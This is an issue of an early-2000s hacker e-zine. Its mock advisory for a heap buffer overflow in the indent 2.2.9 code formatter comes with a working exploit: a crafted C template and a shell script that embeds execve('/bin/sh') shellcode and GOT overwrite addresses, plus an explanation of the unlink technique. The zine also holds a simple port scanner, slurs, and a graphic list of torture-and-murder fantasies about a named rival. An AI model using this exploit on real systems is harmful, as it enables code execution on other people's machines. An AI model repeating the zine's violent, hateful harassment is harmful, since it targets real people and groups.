¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ::ÆÆÆ[www.blackhat.cx]ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ:: ____________ --)-----------|____________| ,' ,' -)------======== ,' ____ ,' `. `. ,' ,'__ ,' `. `. ,' ,' `. `._,'_______,'________________[ vol.2 <=> issue#2 ] __________.____ _____ _________ ____ __.__________.___ _______ ___________ \______ \ | / _ \ \_ ___ \| |/ _______ /| |\ \ \_ _____/ | | _/ | / /_\ \/ \ \/| < / / | |/ | \ | __)_ | | \ |___/ | \___| | \__/ /__| | \_| \ |______ ________ ____|__ /\______ _____|__ __________\___\____|_______________/ \/ \/ \/ \/ \/ @blackhat.cx .-"" |=========================== ______________ |--------------------------------- "-...l_______________________ | |' || |_]__ | [`-.|__________ll_| |----- www.blackhat.cx -------- ,' ,' `. `. | (c) The b-zine corp. | ,' ,' `. ____`. ------------------------------- -)---------======== `. `.____`. __ `. `. / /\ `.________`. _ / / \ --)-------------|___________| ,-- / /\/ / \ -, | ,/ / \/ / |----> the table of contents ,---| \ \ / |---------------------------------------------------------------, | `-- \ \ / -----' "Trying is the first step towards failure" | `\`*_' - Homer J. Simpson | \__________________________________________________________________________' | |:--+-- 0x01 -+Welcome -------------------------------------------------+------------- |:--+-- > 1ntroduct1on |:--+-- > About th4 b-z1ne st4ff |:--+-- > cont4ct uz |:--+-- > gr3etz && hatez |:--+-- 0x02 -+Pr0ix Payback time --------------------------------------+------------- |:--+-- > 10 reasons why pr0ix is a retard |:--+-- > 10 things to d0 wit pr0ix |:--+-- 0x03 -+ju4erz m4dn3zz ------------------------------------------+------------- |:--+-- > from /home/shev |:--+-- 0x04 -+b4d n3wz ------------------------------------------------+------------- |:--+-- > 1nd3x |:--+-- > d1v1n31nt wh1t3h4t |:--+-- 0x05 -+Art1cl3z ------------------------------------------------+------------- |:--+-- > Winnie The Pooh Hacking Squadron |:--+-- > 4nd th3 g00d13 |:--+-- 0x06 -+Thank you and good bye ----------------------------------+------------- |:--+-- > outro `-------------------------------------------------------------------------------------' ::ÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆÆ[www.blackhat.cx]ÆÆÆ:: --+-- 0x01 -+Welcome --------------------------------------+-------------------------- > 1ntroduct1on [By: uNkl m0lti13hm0r] Hi im uNkl m0lti13hm0r and im the poor jew that fell for lkm's 'ill-let-you-touch-my-penis-if-you-write-all-the-boring-stuff-for-my-ezine'-trick. Few wanted to write something for our magazine... well actually many, but we dont want any more of sinister's ghey cookie recipes now do we? :< well... after a wh0le lotta crap, we finally got this god-damn thing ready!@$#... unfortunately i have some sad newz before you start reading this orgasmic collection of eleiht2tehmaximewm-ezine ..... this will be the last issue of the black-hat zine ever. im sorry, but we are basically to damn lazy. we've had plenty of nice texts (EXCLUDING EVERYTHING THAT SINISTER MADE) in the latest zines, and we are going to try to make this one the zine you will remember us for. now i wont bore you anymore, read on... yours sincerely, uNk0L m0LtiEhm0rrrrr. > About th4 b-z1ne st4ff [By: st4ff] [ lkm - igl00 m4zter from the v0lc4n0 island ] [ sp4c3 c0wb0y - MENTALLY DAMAGED BY HITLERS SHOWERS ] [ uNkl m0lti13hm0r - teh h1mc0k3 wreckage ] [ doktur an0nymou$ - y0 y0u d0nt kn0w him f0 sh0! ] [ schwartzn1gg3r - t3h b1tch fr0m w3zt s1de LA ] > cont4ct uz > gr3etz && hatez --+-- 0x02 -+Pr0ix Payback time --------------------------------------+--------------- > 10 reasons why pr0ix is a retard [By: uNkl m0lti13hm0r] hi! i assume you all have heard of the publiq enemy pr0ikz/whatever. pr0ix is a dumb #dorknet/hack.cock.zad/ whatever niger who likes to fuck dead animals. teh blakhats h8 pr0ix because: #1 - Pr0ix is gay, and he will try to have sex with you in your ass if you even pretend to be his friend. #2 - Pr0ix leeches exploitz to g0vb0i who immediately uploadz 2 hack.co.za with some lame php script he got on the web 5 secs b4 he emails it to ofir@securityfocus.com. luckily, pr0ix+govb0i r so fucking stupid they cant even paste an email witout spelling errorz so none of the emails ever gets thru. #3 - pr0ix is fat and dreamz about joining the romanian xf0rze. #4 - hey dvdman lets packet the phc some more!@!@!@ #5 - yo guys i finally got rpc-dcom autorooter to execute correctly! #6 - pr0ix teeth+armpits smellz worse then divineint's defecation #7 - pr0ix gave a blowjob 2 dianora 4 sp00f #8 - pr0ix sweat smell funny :< #9 - his nick has a number in it #10 - he's italian > 10 things to d0 wit pr0ix [By: uNkl m0lti13hm0r] #1 - make a monkey with the ebola virus bite pr0ix dick off and then he will sit in there and bleed without f00d or water for a week or two while waiting for the death of the virus. if he bleedz to fast we'll just giv him a blood transfer. #2 - we cud take a giljotine and ch0p off hiz fingers/c0q/toez and leave him in a smaaaalll room, and wait for the blood go up so much he could swim in it, then we shoot him in his fuqing kneecap wit a shotgun and watch him drown in his own blood wit the videocameraz we mount in the room\ #3 - we take a chainsaw and stick it down his fuqn throat and watch his whole body get sawed in a 100 piecez while the ch41ns4w goesz all crazy #4 - slit his m0thafukn throat wit an openbsd cd then send the cd back to theo, asking for a refund and watch theo get HIV #5 - lock him in a room and play h4ppy tr3e fri3nds songs all nights and wait till cleavez his own skull wit the axe we accidentally leave in the room #6 - we pour around 50 litres of nap4lm on him and throw cigarettez on him #7 - we d0 it the 0ld skewl way: we hang him on the streetz (after about 5 hourz wit stun gun electrocution+chinese torture of courze) #8 - we hammer his ballz with a b4d4zz sledgehamm0r and then we pour VX gas down his throat and watch his skin melt, and then we laugh as he spits up hiz own fuqn guts HEH #9 - we take a rope around his non existant c0q and the other end after a car.. w3 start the car and drag him after making his hole skin get burnt off.. if hes still alive we beat his fuqin head in wit an aliminium baseball bat #10 - gather 200 blaqh@z and make them all shit down pr0ixz throat untill he dies 2 --+-- 0x03 -+ju4erz m4dn3zz ------------------------------------------+--------------- > from /home/shev y0 look @ th4t sc0ttish sk1llz -bash-2.05b$ cat diss.c /* diss.c by shev /alias diss { exec -o ~/code/diss -d } /alias uberdiss { exec -o ~/code/diss -u } /alias counterdiss { exec -o ~/code/diss -c } wh00hahshit! - #jEWcREW dissware dedicated to leet.c, because it's a legend */ #include #include int main(int argc, char **argv) { char c; while((c = getopt(argc, argv, "duchebag"), 0x00) != -1) { switch(c) { case 'd': //diss printf( "\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n"); break; case 'u': //ubderdiss printf( "\e[1;33mU \e[1;32mB \e[1;31mE \e[1;36mR \e[35m- " "\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n"); break; case 'c': //counterdiss printf( "\e[1;33mC \e[1;32mO \e[1;31mU \e[1;36mN \e[1;33mT \e[1;32mE \e[1;31mR \e[1;36m- " "\e[1;33mD \e[1;32mI \e[1;31mS \e[1;36mS \e[1;34m!@#~% \n"); break; case 'h': usage(); default: usage(); } break; } exit(0); } int usage() { fprintf(stderr, "diss.c v0.1 by shev\n" "Usage: ./diss [OPTION]\n" "* -d:\tdiss!\n" "* -u:\tuberdiss!\n" "* -c:\tcounterdiss!\n" "* -h:\tthis help!\n"); exit(1); } -bash-2.05b$ cat shevscan.c /* A simple TCP portscanner By shev [shev@somehost.org] [1999] // shev, somehost.org was not reg'd until the year 2002! Shouts to #mafia / #phsc // are you trying to make out you've been coding for 4 years ?:| */ #include #include #include #include #include #include #include #include #define MAXPORT 1024 int main(int argc, char **argv) { int i, MAX, sock; struct sockaddr_in adr_inet; struct servent *port; struct hostent *ip; printf( "-----------------------------\n" "| TCP portscanner |\n" "| by shev [shev@somehost.com] |\n" "-----------------------------\n", argv[0]); if (argc < 2) { fprintf(stderr, "Usage: %s [MAX PORT]\n", argv[0]); exit(EXIT_FAILURE); } if (argv[2] != 0x0) { MAX=atoi(argv[2]); } else { MAX=MAXPORT; } ip = gethostbyname (argv[1]); if(!ip) { printf("error: could not resolve hostname.\n"); exit(EXIT_FAILURE); } printf( "\nscanning:\t%s\n" "maxport:\t%d\n\n" "results:\n" "\t\tport\tservice\n", argv[1], MAX); bzero(&adr_inet,sizeof(adr_inet)); adr_inet.sin_family = AF_INET; bcopy (ip->h_addr, (char *) &adr_inet.sin_addr, ip->h_length); for(i = 0; i < MAX; i++) { if (( sock = socket(AF_INET,SOCK_STREAM,0) ) < 0 ) { perror("socket() "); exit(1); } adr_inet.sin_port = htons(i); if (connect(sock,(struct sockaddr *) &adr_inet,sizeof(adr_inet)) == 0) { port = getservbyport(ntohs(i), "tcp"); if(port != NULL) printf("\t\t%d\t%s\n", i, port->s_name); if (port == NULL) printf("\t\t%d\tUNDETERMINED\n", i); } close(sock); } printf("\nScanning finished!\n"); } -bash-2.05b$ --+-- 0x04 -+ b4d n3wz -----------------------------------------------+--------------- > H34dl1n3z [By: doktur an0nymou$ && schwartzn1gg3r ] Ac00rd1ng to: doktur an0nymou$ <-> ducer the polish hacker lost his ircs account for smbclienting half of the world from ircs shell servers. <-> Ac00rd1ng to: doktur an0nymou$ <-> ADM is getting even more active, prepare for a takeover !@# <-> Ac00rd1ng to: doktur an0nymou$ <-> shiftee the retired hacker (ircer now), lost his access to logos.relcom.ru by the cause of cracking too much channel keys with his script <-> Ac00rd1ng to: doktur an0nymou$ <-> sionide learnt how to drive a go-cart roflol <-> Ac00rd1ng to: doktur an0nymou$ <-> pr0ix the prince of pranks, now has access to CHANFIX database and already took over a lot big channels, wonder when ircops gonna realise that his a scumbag <-> Ac00rd1ng to: doktur an0nymou$ <-> halvar and calvados are now officially girlfriendqs for being able to drink themselves under the floor, even tho calvados also loves ParaBytes, who schooled him on win32asm <-> Ac00rd1ng to: doktur an0nymou$ <-> zip of #mafia got caught for hacking wait3rs #darknet access in the botnet. his hdd is now completely full with messages like "h4ck.c0.z4 0wnz u l1l f00l" <-> Ac00rd1ng to: doktur an0nymou$ <-> north_ now has the worlds ever sucky sendmail exploit <-> Ac00rd1ng to: doktur an0nymou$ <-> the fluffy bunny is back online, prepare for newer defaces (pH33R) <-> Ac00rd1ng to: doktur an0nymou$ <-> om the israeli hacker (not yet a kiddie actually) is trying to hack a NATed box via its gateways, he already tried mission hackit with nmap, but had no luck yet <-> Ac00rd1ng to: schwartzn1gg3r <-> DaStand is happy now.. he recently goes out drinking with his hacker friends (scrippie, jj, etc). they gave him a so-sophisticated-looking-like exploit, he tried to compile but it took him 3 days to fix and compile, after that he is reinstallnig his home box. 4nd now he is the infamous phC h4cker sky- s0 w4tch out for pHC-k3nny.c <-> Ac00rd1ng to: doktur an0nymou$ <-> americas (in!)famous hacker (dumbass fuck) PEN is now ddosing his friends for no reason. Actions mirroring his skills are like he is not able stop his floodnet once he started it. <-> 1 > d1v1n31nt wh1t3h4t [by: schwartzn1gg3r] 08:39 -!- aprodite [-aprodite@0xbadc0ded.org] has joined #blackhat 08:40 < aprodite> sup guys 08:40 <@censored> nothing important whitehat-boy 08:41 <@censored> hmm 08:41 <@censored> :P 08:43 < aprodite> haha whitehat b0y 08:43 < aprodite> =] 08:44 < aprodite> suo mcbethy long time no see/type 08:44 <@censored> :) 08:44 <@censored> i know you under other handle ? -aprodite@0xbadc0ded.org (stealth) 08:44 -!- Irssi: Starting query in stealth with aprodite 08:44 been ages...sup? 08:44 u know who i am rite 08:44 not really 08:44 o 08:45 divineint =] 08:45 oh 08:45 so you are whitehat now ? 08:45 0xbadc0ded.org is whitehat group 08:45 obviously not why? 08:45 oh 08:45 l'm still pure black of course 08:45 hhehee 08:46 u don't get much darker 08:46 hehe 08:46 you are badc0ded.org member now ? 08:46 neh 08:46 just got a shell no bigge =] 08:47 y what have u against them? 08:47 not much.. i just hate them :P 08:47 hahahaa 08:47 funky =] 08:47 anyways their nice dudes if u get to knwot hem after a while 08:48 still trading on darknet ? 08:48 anyways quit bitching about my host :P 08:48 naturally 08:48 i hat your host 08:48 and many other places of course 08:48 hate 08:48 hehe 08:48 well get me a shell on phiral then 08:48 matrix runs it or what 08:49 yep 08:49 o 08:49 proably sniffs you long time =] 08:49 hhee 08:49 i don't care 08:49 o i would care 08:49 anyways so sup whats been going on 08:50 not much 08:50 haha i can't belive anyone accusing me of being whitehat hahehehe 08:50 coding & working 08:50 *lol* 08:50 08:50 not much 08:50 08:50 haha i can't belive anyone accusing me of being whitehat hahehehe 08:50 08:50 coding & working 08:50 08:50 *lol* 08:50 ah the usual sh1t eh 08:50 shit 08:51 :P 08:51 heh 08:51 wrong mouse move 08:51 :) 08:52 maybe you are not white 08:52 but badc0ded obviously is 08:52 badc0ded.org 08:53 wow 08:53 they have phiral.com in links section 08:53 :) 08:57 <@othercensored> re 08:57 <@othercensored> censored;] 08:57 <@censored> yo othercensored 08:57 <@censored> :) 08:57 <@othercensored> :> 08:58 <@censored> crucified 08:58 <@othercensored> ;] 08:59 <@othercensored> widze twoja twarz !! 08:59 <@othercensored> :D 08:59 <@censored> heh 09:00 <@othercensored> http://slashdot.org/article.pl?sid=00/12/22/0157229&mode=nocomment 09:00 <@othercensored> NSA linux;] 09:00 -!- aprodite [-aprodite@0xbadc0ded.org] has quit [BitchX-1.0c19 -- just do it.] 09:01 <@censored> hum 09:01 <@othercensored> hm --+-- 0x05 -+ Art1cl3 ------------------------------------------------+--------------- > Winnie The Pooh Hacking Squadron [by: Winnie The Pooh Hacking Squadron] XXXX XX XX XXXX XX XX XXX XX XX XX XX XX XXXX XX XX XX XX XXXX XX XX XX XXX XX XX XX XXX XX XX XXX XX XX XXX XX XX XX XX XXXX XX XX XX XX XX XX X XX XX XXX XX XX XX XX XXX XX XX XXX XXXX XX XXX XXX XX XXX XXXX XXX XXXXX XX XXXXX XX XXXX XX XX XXX XXXXXXXX X XX XX.....XXXXX XX XX XX.......XXXXXXX XX XX XX XX............XXXXXXX XX XX XXX XX..X..............XXXXXX XXXXXXXXXX XXX....................XXXX XX XX........................XXXX XXXXX XX.............................XXXX..XX XX.................................XX..XX XX......................................XX XXX.......................................XX XXXX.........................................XX XXX...................X........................XX XXXXXXX...............X...........................XX XX XXXX...........XX..........................XX XX XXX.......XX............................XX XX XXX...XX..............................XX XX XXXX....XXXXXXXXXXXXXXXXXX..........XX XX XXXXXXXX XXXXXXXXXXXXXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX X XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX X XX XX XX XXX XX X XXXX XX XXXX XX XX XX XX XXXXXX XX XX XXX XX XXXX XXX XX XX XXX XX XX XX XX XX XX XX XX XX XX XXXX XX XX XXX XX XX XXX XX XX XX XXX XX XX XXXXXXX XX XX XXX XXX XX XX XXX XXX XX XX XXX XX XXX XX XX XX XX XX XX XX XXX XX XX XX XX XX XXXXX XX XX XX XX XX XX XX XXXX XX XX XX X XX XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXX XXX XX XXX XXXXX XXX XXX XXXXX . . .___.. .__ . | |*._ ._ * _ | |_ _ [__) _ _ |_ |/\||[ )[ )|(/, | [ )(/, | (_)(_)[ ) . . . __. . |__| _. _.;_/*._ _ (__ _.. . _. _|._. _ ._ | |(_](_.| \|[ )(_] .__)(_](_|(_](_][ (_)[ ) ._| | .__ , [__)._. _ __ _ ._ -+- __ * | [ (/,_) (/,[ ) | _) * Software: indent Version: 2.2.9 Vulnerability: buffer overflow while parsing .c file Found date: Aug 2002 Release date: today you stupid whitehat boy Researchers: Winnie The Pooh Hacking Squadron Favourite food: whitehat soup [0] LICENSE 1) No whitehat whore can use this in his pseudo-security work 2) divineint can't trade exploit attached to this advisory on #darknet@efnet nor other lame channel (for people who don't know it yet - his new nick is illumanti(z), is he hidding ?!) 3) Every hacker can implement exploit for this vuln in his codes to protect them from script kiddies and whitehats. 4) WtPHS strongly encourage hackers to use this against whitehats. 5) WtPHS don't give a shit if you hurt yourself [1] INTRO indent is really fucking leet tool that improves appearance of C source code. It was designed to help people reading sources written by damn stupid and unskilled programmers like You Dong-Hun or Theo the Radt. It is really helpful nowadays because of that whores who think they are coders. Unfortunatelly authors of indent also made their software vulnerable to buffer overflow. [2] DETAILS handle_token_colon(...) is vulnerable function. Buffer overflow occurs while parsing text (from .c file of korz), which indent treat like label. It copies whole 'label' to, 1000 bytes long, buffer on heap, without bounds checking. (Note for divineint-alike people: such overflow can lead to overwrite of heap stuctures and as result of this - arbitrary code execution). This is vulnerable part of handle_token_colon(...) function: for (t_ptr = s_code; *t_ptr; ++t_ptr) { *e_lab++ = *t_ptr; /* turn everything so far into a label */ } (Note for gorion(*)-alike people: this loop will copy as long as NULL byte will be find in source string) [3] EXPLOITATION This section is needed for stupid people like divineint or Lorenzo Hernandez Garcia-Hierro (Good Lord! I feel like in south-american telenovel saing his name). Smart people choose clear_buf_break_list() function to cause code execution. This function is executed just after our vulnerable loop, so we don't risk application crash. indent breaks source code and makes double-linked list (buf_break_list) of code parts. Mentioned function free()'s all buf_break_list entries. This double-linked list entries are allocated after 'labbuf' (e_lab points to labbuf) so we are able to overwrite it. Now exploitation is very easy. Overwrite free() GOT entry with and make clear_buf_break_list() loop run once again by setting 'prev' field of buf_break_st_ty struct to some readable value. Exploit for this vulnerability for indent 2.2.9 from slackware 9.0 is attached to this advisory. NOTICE!!!! QUIZ FOR KIDDIES: --------------------------------------------------------------------- This exploit have simple execve(shell) shellcode. What do you have to change to make this exploit useful ? --------------------------------------------------------------------- FIRST PERSON WHO SENDS US GOOD ANSWER WINS OpenSSH Buffer Management Vulnerability REMOTE EXPLOIT ... DON'T WAIT !! DO IT NOW! [4] EDUCATIONAL VALUE Whats educational here? One technique used in this exploit. Lets call FD = WHAT and BK = WHERE-8. People with IQ > 75 knows that unlink() will do *(WHAT+0xc)=(WHERE-8) except *((WHERE-8)+8) = WHAT. If we point WHAT to NOPs before our shellcode, unlink() will change few of our NOPs to something else. Executing this 'somethingelse' will probably crash our application. It looks like this: Before unlink(): (gdb) x/20i 0x805b440 0x805b440: nop 0x805b441: nop 0x805b442: nop 0x805b443: nop 0x805b444: nop 0x805b445: nop 0x805b446: nop 0x805b447: nop 0x805b448: nop 0x805b449: nop 0x805b44a: nop 0x805b44b: nop 0x805b44c: nop 0x805b44d: nop 0x805b44e: nop 0x805b44f: nop 0x805b450: nop 0x805b451: nop 0x805b452: nop 0x805b453: nop (gdb) x/x 0x8058dc8 0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x40019f52 After unlink(): (gdb) x/x 0x8058dc8 0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x0805b440 (gdb) x/20i 0x805b440 0x805b440: nop 0x805b441: nop 0x805b442: nop 0x805b443: nop 0x805b444: nop 0x805b445: nop 0x805b446: nop 0x805b447: nop 0x805b448: nop 0x805b449: nop 0x805b44a: nop 0x805b44b: nop 0x805b44c: rorb $0x90,0x90900805(%ebp) 0x805b453: nop 0x805b454: nop 0x805b455: nop 0x805b456: nop 0x805b457: nop 0x805b458: nop 0x805b459: nop Next call to free() will jump to 0x805b440. If execution flow will reach 0x805b44c, program will crash at this instruction. Solution is simple, however WtPHS don't remember anybody describing it before, so ... here it is: Instead of NOPs you can use relative jmp's like this: Before unlink(): (gdb) x/20i 0x805b440 0x805b440: jmp 0x805b44a 0x805b442: jmp 0x805b44c 0x805b444: jmp 0x805b44e 0x805b446: jmp 0x805b450 0x805b448: jmp 0x805b452 0x805b44a: jmp 0x805b454 0x805b44c: jmp 0x805b456 0x805b44e: jmp 0x805b458 0x805b450: jmp 0x805b45a 0x805b452: jmp 0x805b45c 0x805b454: jmp 0x805b45e 0x805b456: jmp 0x805b460 0x805b458: jmp 0x805b462 0x805b45a: jmp 0x805b464 0x805b45c: jmp 0x805b466 0x805b45e: jmp 0x805b468 0x805b460: jmp 0x805b46a 0x805b462: jmp 0x805b46c 0x805b464: jmp 0x805b46e 0x805b466: jmp 0x805b470 After unlink(): (gdb) x/10i 0x805b440 0x805b440: jmp 0x805b44a 0x805b442: jmp 0x805b44c 0x805b444: jmp 0x805b44e 0x805b446: jmp 0x805b450 0x805b448: jmp 0x805b452 0x805b44a: jmp 0x805b454 0x805b44c: rorb $0xeb,0x8eb0805(%ebp) 0x805b453: or %ch,%bl 0x805b455: or %ch,%bl 0x805b457: or %ch,%bl (gdb) x/10i 0x805b454 0x805b454: jmp 0x805b45e 0x805b456: jmp 0x805b460 0x805b458: jmp 0x805b462 0x805b45a: jmp 0x805b464 0x805b45c: jmp 0x805b466 0x805b45e: jmp 0x805b468 0x805b460: jmp 0x805b46a 0x805b462: jmp 0x805b46c 0x805b464: jmp 0x805b46e 0x805b466: jmp 0x805b470 This way we jumped over shitty instruction. These jmps will lead execution flow to our shellcode, but to be sure that no jmp will jump into middle of shellcode you have to put few (at least 8) NOPs before shellcode. Than last jmp will jump to NOPs and than shellcode will be executed properly. [5] IMPACT Possible impact is quite big. For example companies and software developers that are terrified because of their software is damn shitty (Cisco, Apache, OpenBSD, Linux Kernel first come to our mind) could implement exploit for this vuln into their source codes to make hackers life difficult. [6] FLAMES, SHOUTOUTS and FINAL NOTES *) no, divineint, you can't get our juarez - stop begging for it biatch *) no, Stefan Esser, you can't steal our juarez and public it as your own, because you are to stupid to own us. *) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron *) shoutouts to PHC for terrorizing whitehats and full-disclosure *) recent OpenSSH vulnerability is exploitable *) greetings to Lorenzo Hernandes Garcia-Hierro for making us laught on the floor while reading his posts. *) kudos to Alan Alexander Milne (R.I.P - 1956) [7] OUTRO the end... > 4nd th3 g00d13 [by: Winnie The Pooh Hacking Squadron] $ cat winnie-template.c int main(int argc, char **argv) { printf("W1nN13 Th3 p00H H4ck1n6 SqU4dr0n pR0udlY Pr3z3n7z:\n" "0-day P0f f0R indent-2.2.9 bUFF3r oV3rFl0W vU1n3r4b1l1ty\n"); asm ( "nop\n" "nop\n" "nop\n" "nop\n" "nop\n" "jmp continue\n" ".string \"JPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPJPNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS\"\n" ".string \"cccddddeeeeffffgggghhhhiiiijjjjkkkkllll\"\n" "continue:\n" "nop\n" "nop\n" :); return 0; } $ cat prepare.sh #!/bin/sh # these addresses are working on indent 2.2.9 from # slackware 9.0 # what_to_write # # it should be 2bytes aligned because it have to # point to one of \xeb from jmps. If it points # to \x08 - exploitation will fail FD=`echo -e "\x40\xa4\x05\x08"` # where_to_write-0x8 # # it is good idea to point it to free() field in GOT BK=`echo -e "\xc0\x7d\x05\x08"` # change all 'JP' to \xeb\x08 (relative jmp to $+8 bytes) sed -e "s/JP/`echo -e \"\xeb\x08\"`/g" winnie-template.c > temp.c # change all 'N' to \x90 (NOP) sed -e "s/NNNNNNNNNNNNNNN/`echo -e \"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\"`/" temp.c > winnie.c # change 'S's to shellcode sed -e "s/SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS/`echo -e \"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\/bin\/sh\"`/" winnie.c > temp.c # exploit with this shellcode is quite useless, because # it is simple execve(shell) shellcode. If you want to # change shellcode, first prepare winnie-template.c - # change 'SSSS...' len to len of your new shellcode, # but len of whole 'JP...NNN...SSS' should remain the same. # You can remove few 'JP's. You have to leave few NOPs # before shellcode, because one of jmp's will land in them # (this is to be sure that no jmp will land in the middle # of shellcode. When you changed template, change sed line # above - change 'SSSS...' len and shellcode. # change 'dddd' 'eeee' 'ffff' to 0xfffffffc (-4) sed -e "s/dddd/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c sed -e "s/eeee/`echo -e \"\xfc\xff\xff\xff\"`/" winnie.c > temp.c sed -e "s/ffff/`echo -e \"\xfc\xff\xff\xff\"`/" temp.c > winnie.c # change 'gggg' to FD (what_to_write) sed -e "s/gggg/$FD/" winnie.c > temp.c # change 'hhhh' to BK (where_to_write-8) sed -e "s/hhhh/$BK/" temp.c > winnie.c # 'iiii' is prev_size, but we don't need to change it # Left it untouched # change 'jjjj' to 0xfffffff1 (size field, pointing to these # three (-4)) sed -e "s/jjjj/`echo -e \"\xf1\xff\xff\xff\"`/" winnie.c > temp.c # change 'llll' to some readable value (on stack for example) # it is 'next' field of overwritten buf_break_list struct sed -e "s/llll/`echo -e \"\x40\xff\xff\xbf\"`/" temp.c > winnie.c rm temp.c $ --+-- 0x06 -+Thank you and good bye ----------------------------------+------------- > outro [by: lkm] Ok to make long story short, i've had enough of "irc" it's becoming useless 4 me atleast, so i'm just here to say goodbye and i sure hope you all have good life! Peace out LKM